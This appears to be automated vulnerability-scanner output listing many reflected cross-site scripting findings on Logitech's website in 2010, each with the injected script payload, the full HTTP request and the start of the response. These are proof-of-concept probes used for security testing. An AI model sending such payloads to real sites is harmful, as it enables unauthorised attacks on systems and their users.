The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 130ab</script><script>alert(1)</script>fdd4ea32bae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css130ab</script><script>alert(1)</script>fdd4ea32bae/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7337e"><script>alert(1)</script>9c46007eace was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css7337e"><script>alert(1)</script>9c46007eace/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ab5"><script>alert(1)</script>2a41a44e873 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css64ab5"><script>alert(1)</script>2a41a44e873/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7780a</script><script>alert(1)</script>e71e113e370 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css7780a</script><script>alert(1)</script>e71e113e370/v2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66455</script><script>alert(1)</script>93d408639fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v266455</script><script>alert(1)</script>93d408639fe/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c8ec"><script>alert(1)</script>236c4f2a2fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v22c8ec"><script>alert(1)</script>236c4f2a2fb/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69747</script><script>alert(1)</script>2ead2981d11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69eaa"><script>alert(1)</script>b98875c86ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 677bf"><script>alert(1)</script>08d1a2cfc0a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19b2e</script><script>alert(1)</script>b9fd6cf839a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bdd9"><script>alert(1)</script>cfac07b515 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21c2e</script><script>alert(1)</script>1fa3f266cb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebd52</script><script>alert(1)</script>cffdcf4e525 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cssebd52</script><script>alert(1)</script>cffdcf4e525/v2/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6297"><script>alert(1)</script>71e93c23446 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /cssf6297"><script>alert(1)</script>71e93c23446/v2/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e584a</script><script>alert(1)</script>b00ac24ac15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2e584a</script><script>alert(1)</script>b00ac24ac15/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5b35"><script>alert(1)</script>64bd4772672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2f5b35"><script>alert(1)</script>64bd4772672/cmn/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b37"><script>alert(1)</script>aa30ad21361 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2/cmn73b37"><script>alert(1)</script>aa30ad21361/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30e09</script><script>alert(1)</script>9011e9a300b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/cmn30e09</script><script>alert(1)</script>9011e9a300b/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d232e</script><script>alert(1)</script>51d6d4a1ebd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50dc6"><script>alert(1)</script>7338e131cc7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7309b</script><script>alert(1)</script>1ad8e92000f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css7309b</script><script>alert(1)</script>1ad8e92000f/v2/cmn/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 937d4"><script>alert(1)</script>4335ca57442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css937d4"><script>alert(1)</script>4335ca57442/v2/cmn/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8eec</script><script>alert(1)</script>b6e93325230 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2d8eec</script><script>alert(1)</script>b6e93325230/cmn/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9683"><script>alert(1)</script>63cacfcbc63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2a9683"><script>alert(1)</script>63cacfcbc63/cmn/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c80</script><script>alert(1)</script>51c42a7cc8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/cmn49c80</script><script>alert(1)</script>51c42a7cc8e/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d633"><script>alert(1)</script>622f6629e8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2/cmn2d633"><script>alert(1)</script>622f6629e8d/navigation/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef9f"><script>alert(1)</script>ec6502349e2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css/v2/cmn/navigationeef9f"><script>alert(1)</script>ec6502349e2/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99a20</script><script>alert(1)</script>dde550d6d7a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/v2/cmn/navigation99a20</script><script>alert(1)</script>dde550d6d7a/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b74"><script>alert(1)</script>044deb99727 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /css96b74"><script>alert(1)</script>044deb99727/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be33f</script><script>alert(1)</script>9f6cd5ee0e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cssbe33f</script><script>alert(1)</script>9f6cd5ee0e7/v2/cmn/navigation/bg-nav-headers/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:00:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8352b</script><script>alert(1)</script>b6ca9ac0cdd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
